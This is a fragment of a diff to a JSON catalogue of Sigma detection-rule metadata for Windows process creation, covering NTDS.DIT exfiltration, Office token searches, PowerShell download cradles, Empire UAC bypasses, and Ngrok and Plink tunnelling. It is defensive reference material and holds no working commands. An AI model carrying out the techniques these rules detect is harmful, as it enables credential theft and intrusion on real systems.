"author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", - "creation_date": "2019/01/16", - "falsepositive": [ - "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." - ], - "filename": "proc_creation_win_susp_net_execution.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", - "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", - "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", - "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1007", - "attack.t1049", - "attack.t1018", - "attack.t1135", - "attack.t1201", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1087.001", - "attack.t1087.002", - "attack.lateral_movement", - "attack.t1021.002", - "attack.s0039" - ] - }, - "uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", - "value": "Net.exe Execution" - }, - { - "description": "Detects net use command combo which executes files from WebDAV server; seen in malicious LNK files", - "meta": { - "author": "pH-T", - "creation_date": "2022/09/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_net_use.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/ShadowChasing1/status/1552595370961944576", - 
"https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "value": "Suspicious Net Use Command Combo" - }, - { - "description": "Detects a when net.exe is called with a password in the command line", - "meta": { - "author": "Tim Shelton (HAWK.IO)", - "creation_date": "2021/12/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_net_use_password_plaintext.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use_password_plaintext.yml" - ], - "tags": "No established tags" - }, - "uuid": "d4498716-1d52-438f-8084-4a603157d131", - "value": "Password Provided In Command Line Of Net.exe" - }, - { - "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/14", - "falsepositive": [ - "Rare legitimate installation of kernel drivers via sc.exe" - ], - "filename": "proc_creation_win_susp_new_kernel_driver_via_sc.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ] - }, - "uuid": "431a1fdb-4799-4f3b-91c3-a683b003fc49", - "value": "New Kernel Driver Via 
SC.EXE" - }, - { - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_new_service_creation.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ] - }, - "uuid": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", - "value": "Suspicious New Service Creation" - }, - { - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/14", - "falsepositive": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" - ], - "filename": "proc_creation_win_susp_ngrok_pua.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://ngrok.com/docs", - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", - 
"https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", - "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", - "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", - "https://twitter.com/xorJosh/status/1598646907802451969", - "https://www.softwaretestinghelp.com/how-to-use-ngrok/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572" - ] - }, - "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", - "value": "Ngrok Usage" - }, - { - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "meta": { - "author": "frack113", - "creation_date": "2021/12/10", - "falsepositive": [ - "Network administrator computer" - ], - "filename": "proc_creation_win_susp_nmap.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://nmap.org/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nmap.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ] - }, - "uuid": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", - "value": "Suspicious Nmap Execution" - }, - { - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "meta": { - "author": "Max Altgelt", - "creation_date": "2021/12/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_non_exe_image.yml", - "level": 
"high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://pentestlaboratories.com/2021/12/08/process-ghosting/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "value": "Execution of Suspicious File Type Extension" - }, - { - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_ntdll_type_redirect.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.x86matthew.com/view_post?id=ntdll_pipe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", - "value": "Suspicious Ntdll Pipe Redirection" - }, - { - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/11", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_ntds.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://pentestlab.blog/tag/ntds-dit/", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", - "https://github.com/zcgonvh/NTDSDumpEx", - 
"https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ] - }, - "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08", - "value": "Suspicious Process Patterns NTDS.DIT Exfil" - }, - { - "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/14", - "falsepositive": [ - "Legitimate usage to restore snapshots", - "Legitimate admin activity" - ], - "filename": "proc_creation_win_susp_ntdsutil_usage.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ] - }, - "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", - "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)" - }, - { - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "meta": { - "author": "Elastic (idea), Tobias Michalski", - "creation_date": "2022/05/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_ntlmrelay.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://twitter.com/med0x2e/status/1520402518685200384", - "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" - ] - }, - "uuid": "bb76d96b-821c-47cf-944b-7ce377864492", - "value": "Suspicious NTLM Authentication on the Printer Spooler Service" - }, - { - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "meta": { - "author": "Nasreddine Bencherchali @nas_bench", - "creation_date": "2021/12/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "value": "Suspicious NT Resource Kit Auditpol Usage" - }, - { - "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", - "meta": { - "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate use of odbcconf.exe by legitimate user" - ], - "filename": 
"proc_creation_win_susp_odbcconf.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", - "https://twitter.com/Hexacorn/status/1187143326673330176", - "https://redcanary.com/blog/raspberry-robin/", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.008" - ] - }, - "uuid": "65d2be45-8600-4042-b4c0-577a1ff8a60e", - "value": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe" - }, - { - "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/25", - "falsepositive": [ - "Legitimate command-lines containing the string mentioned in the command-line" - ], - "filename": "proc_creation_win_susp_office_token_search.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://mrd0x.com/stealing-tokens-from-office-applications/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ] - }, - "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615", - "value": "Suspicious Office Token Search Via CLI" - }, - { - "description": "The OpenWith.exe executes other binary", - "meta": { - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", - "creation_date": "2019/10/12", - "falsepositive": [ - "Legitimate use of 
OpenWith.exe by legitimate user" - ], - "filename": "proc_creation_win_susp_openwith.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", - "https://twitter.com/harr0ey/status/991670870384021504", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "value": "OpenWith.exe Executes Specified Binary" - }, - { - "description": "Detects EnableUnsafeClientMailRules used for Script Execution from Outlook", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/12/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_outlook.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/sensepost/ruler", - "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" - ] - }, - "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", - "value": "Suspicious Execution from Outlook" - }, - { - "description": "Detects a suspicious program execution in Outlook temp folder", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_outlook_temp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml" - ], 
- "tags": [ - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", - "value": "Execution in Outlook Temp Folder" - }, - { - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_parents.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/x86matthew/status/1505476263464607744?s=12", - "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" - ], - "tags": "No established tags" - }, - "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df", - "value": "Suspicious Process Parents" - }, - { - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", "meta": { "author": "Tim Rauch", - "creation_date": "2022/09/28", + "creation_date": "2022/09/20", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_parent_of_conhost.yml", + "filename": "proc_creation_win_shadowcopy_deletion_via_powershell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parent_of_conhost.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "value": "Conhost Spawned By Suspicious Parent Process" - }, - { - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/10/10", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_pchunter.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.xuetr.com/", - "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", - "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" - ], - "tags": "No established tags" - }, - "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "value": "PCHunter Usage" - }, - { - "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", - "meta": { - "author": "Julia Fomina, oscd.community", - "creation_date": "2020/10/05", - 
"falsepositive": [ - "Use of Program Compatibility Troubleshooter Helper" - ], - "filename": "proc_creation_win_susp_pcwutl.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", - "https://twitter.com/harr0ey/status/989617817849876488", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", - "value": "Code Execution via Pcwutl.dll" - }, - { - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "meta": { - "author": "Julia Fomina, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" - ], - "filename": "proc_creation_win_susp_pester.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Oddvarmoe/status/993383596244258816", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", - "value": "Execute Code with Pester.bat" - }, - { - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/20", - "falsepositive": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" - ], - "filename": "proc_creation_win_susp_pester_parent.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://twitter.com/Oddvarmoe/status/993383596244258816", - "https://twitter.com/_st0pp3r_/status/1560072680887525378", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", - "value": "Execute Code with Pester.bat as Parent" - }, - { - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "meta": { - "author": "Ilya Krestinichev", - "creation_date": "2022/11/03", - "falsepositive": [ - "False positive could occur in admin scripts that execute inline" - ], - "filename": "proc_creation_win_susp_ping_del.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002", - "value": "Suspicious Ping And Del Combination" - }, - { - "description": "Detects a ping command that uses a hex encoded IP address", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/03/23", - "falsepositive": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" - ], - "filename": 
"proc_creation_win_susp_ping_hex_ip.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", - "https://twitter.com/vysecurity/status/977198418354491392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1027" - ] - }, - "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "value": "Ping Hex IP" - }, - { - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/19", - "falsepositive": [ - "Administrative activity using a remote port forwarding to a local port" - ], - "filename": "proc_creation_win_susp_plink_port_forward.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", - "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ] - }, - "uuid": "48a61b29-389f-4032-b317-b30de6b95314", - "value": "Suspicious Plink Port Forwarding" - }, - { - "description": "Execution of plink to perform data exfiltration and tunneling", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/04", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_plink_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572" - ] - }, - "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", - "value": "Suspicious Plink Usage RDP Tunneling" - }, - { - "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", - "meta": { - "author": "frack113", - "creation_date": "2022/11/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powercfg.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", - "value": "Suspicious Powercfg Execution To Change Lock Screen Timeout" - }, - { - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/24", - "falsepositive": [ - "Other tools that work with encoded scripts in the command line instead of script files" - ], - "filename": "proc_creation_win_susp_powershell_cmd_patterns.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", - "value": "Suspicious PowerShell Encoded Command Patterns" - }, - { - "description": "Detects suspicious ways to download files or content using PowerShell", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/24", - "falsepositive": [ - "Scripts or tools that download files" - ], - "filename": "proc_creation_win_susp_powershell_download_cradles.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml" - ], - "tags": "No established tags" - }, - "uuid": "6e897651-f157-4d8f-aaeb-df8151488385", - "value": "PowerShell Web Download" - }, - { - "description": "Detects suspicious ways to download files or content and execute them using PowerShell", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/24", - "falsepositive": [ - "Scripts or tools that download files and execute them" - ], - "filename": "proc_creation_win_susp_powershell_download_iex.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "value": "PowerShell Web Download and 
Execution" - }, - { - "description": "Detects suspicious powershell command line parameters used in Empire", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/04/20", - "falsepositive": [ - "Other tools that incidentally use the same command line parameters" - ], - "filename": "proc_creation_win_susp_powershell_empire_launch.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "value": "Empire PowerShell Launch Parameters" - }, - { - "description": "Detects some Empire PowerShell UAC bypass methods", - "meta": { - "author": "Ecco", - "creation_date": "2019/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_empire_uac_bypass.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", - 
